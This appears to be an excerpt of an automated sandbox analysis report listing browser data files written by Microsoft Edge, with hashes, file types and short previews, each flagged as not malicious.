                                                                                                                                                                                                                                                                                                                          SHA1:389F121A479867E79464D14A2E5928CF4118DD86
                                                                                                                                                                                                                                                                                                                          SHA-256:71A27FE9DED76DAA7DC8682E995206595CDCF9BE07CCD45EC1FCC3B823F1E55C
                                                                                                                                                                                                                                                                                                                          SHA-512:EBAA41159A789D4A9FCECD2368DA81E09C91563853A8A1753F39D61CA0A69A48E0FBE40D6E64312C1993E3C9253E60688D52B14B1D899ADDBD682FFD89E68899
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.514 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/12-11:23:05.515 bb0 Recovering log #3.2025/01/12-11:23:05.517 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:H:H
MD5:D751713988987E9331980363E24189CE
SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:false
Preview:[]
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):20480
Entropy (8bit):2.8236400153893726
Encrypted:false
SSDEEP:192:tTrZbiRgpnbS6lFtvi2PRGja0C50c4p0L/ZJVb:V1b+qS6l3vi2l0lp0LhJVb
MD5:88931E44EB3FD3EEB4755B189EF5D189
SHA1:2E7D76FDC149E1697082239EC203C1D582ED0341
SHA-256:2E1FFD8C636C20E66B766E9E9BD76B0F31D58DBA2B1ED6DAD9C5CBD91621EFE3
SHA-512:AB6B3CE530C7E97E106E65115E2831D34BE6994D627FF648BD039299815F57A3325ECC85872C82AF6B8CFBF714F0762375CCDA8586CEB78634C3CC71A0D72C35
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):36864
Entropy (8bit):1.2136308863565346
Encrypted:false
SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9N:JkIEumQv8m1ccnvS6eqmUlv
MD5:763EB852B8E6C0AB7AFA285C4B2CB022
SHA1:E27EBAFBB7DC98F05352ED9C337E5B1BFEBBC216
SHA-256:64ACA90C40077FBA3E7ED10E01F1EC3ABB3D5AC6AC3C969283E8CF1A363CEA6D
SHA-512:BF793BA9D60608303764BC9C013BE83403651D198CE2CC4C64D6C16C76746D88747298615EB8B7969ECF421720ABEDF7ADABBA017C37C97F36F23360FD14785C
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):38626
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.554568395177905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:CJakCwh7pLGLhgGWPSMf0V8F1+UoAYDCx9Tuqh0VfUC9xbog/OVjE0TMkUrwCsKL:CJakCwXchgGWPSMf0Vu1ja95kNCsKNvB
                                                                                                                                                                                                                                                                                                                          MD5:25403A3A82CD106DF8F34777BF7BBD3B
                                                                                                                                                                                                                                                                                                                          SHA1:5D76480B317925C5686C44E3BD397B5AAB18E65C
                                                                                                                                                                                                                                                                                                                          SHA-256:571D3E6A2C9C11C464BD046D546C3E7680A77993361472A1D760CCA9B8EB8497
                                                                                                                                                                                                                                                                                                                          SHA-512:79561E1B1DE6E2B097A28CEF93CD4BEE0FE40227105525582818D84387A6F76304A8204F5918036363CB242A16794C6F8DDA77E6887266EDA67A8D4FB4C14E6F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.803247967602321
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5Nm6cncmoDCRORpllg2hEYfRHUDldCRORpllg2huaTk5FCRORpllg2hEDRHB:F2emDMrd6YfB0rdUa+rd6DBLrdqOBr
                                                                                                                                                                                                                                                                                                                          MD5:CE7EEF4580D51D1EC09277E06AF8FADB
                                                                                                                                                                                                                                                                                                                          SHA1:B722732C2FB87AEC2B406F652A6D64FCCEC95242
                                                                                                                                                                                                                                                                                                                          SHA-256:E601999EA548F4C2BCCCC4710DD4E2C566B204A07C862369AD307C5E4A453D71
                                                                                                                                                                                                                                                                                                                          SHA-512:1C553B2EC74EC3C03F9FF432B9C71C745F57F518152902554AFC19AB18AEE879F4EEB63A964D48C303DF122B0AE2E9FEB35AB5CF98D0B9BB3A865C134111B7A4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2<...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):299
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.115905973344341
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:14.198 1fcc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/12-11:23:14.218 1fcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):115461
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.580163634315031
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:DIY-Thermocam raw data (Lepton 2.x), scale -12287-112, spot sensor temperature -2251799813685248.000000, unit celsius, color scheme 4, calibration: offset 0.000000, slope 38666541809915985395712.000000
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):190017
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.389568699061764
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:+dMFQyXl/l5/lln/lxEgR/llm5N:+dEzqp5N
                                                                                                                                                                                                                                                                                                                          MD5:47F7267C53C97534E890FEF86B2A5324
                                                                                                                                                                                                                                                                                                                          SHA1:78296EFFCDF1DC9FE36408F996570E2E48546712
                                                                                                                                                                                                                                                                                                                          SHA-256:E85906CECA7C2CEC6388693EBAD3E22171234C7F475B70FBAE48044212BCCC24
                                                                                                                                                                                                                                                                                                                          SHA-512:DCAE7B0FDF12E27E19C31E46658352E554039D3CAF72529848B9E6C82C0CDB6B4E0674FBB8223E3F6B3084A71CE24C643373D11B144BD54F1377A417732B2D30
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:@.....c.oy retne.........................X....,................../.../.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):6019
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.3934684629858882
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:99eTYspyeiumV+KtVPVXIj67Z/m9Xp+Y+VijEvA9XLl9iSrk1s6prAtJlNu7K:GTYsIewV+KtVPVXIjh9Xp+YKiY4Ll9iq
                                                                                                                                                                                                                                                                                                                          MD5:3D3BB28E0D38E55DB391C24A0227F343
                                                                                                                                                                                                                                                                                                                          SHA1:C6CE7096345F281C8CA9AEA81EB26CF15E460A24
                                                                                                                                                                                                                                                                                                                          SHA-256:18729F8A46705A1A538CDD5523263B73776B2ABE044AFB84CBC76E9B3FDF2E33
                                                                                                                                                                                                                                                                                                                          SHA-512:8529006C28740B42D45014A97FEDB7FEFBB3E0B9527B7581516BAE2F6CD7443E92A6BCD5F819690DC0B62C2DD71979D68719D7BC93976F2F6A5D4C90D59711B8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................[..b................next-map-id.1.Cnamespace-fd89ab25_d94b_4705_bab3_e14bd5290f2f-https://ntp.msn.com/.0..A.>................map-0-shd_sweeper.,{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.a.d.s.-.c.f.v.4.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.-.c.c.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.4.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.i.5.c.,.p.r.g.-.1.s.w.-.s.a.l.i.k.e.m.o.r.e.t.3.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.1.s.-.w.p.o.-.p.r.1.-.s.d.s.h.p.1.5.c.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.c.,.b.t.i.e.-.r.e.s.t.o.f.v.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.144772086411305
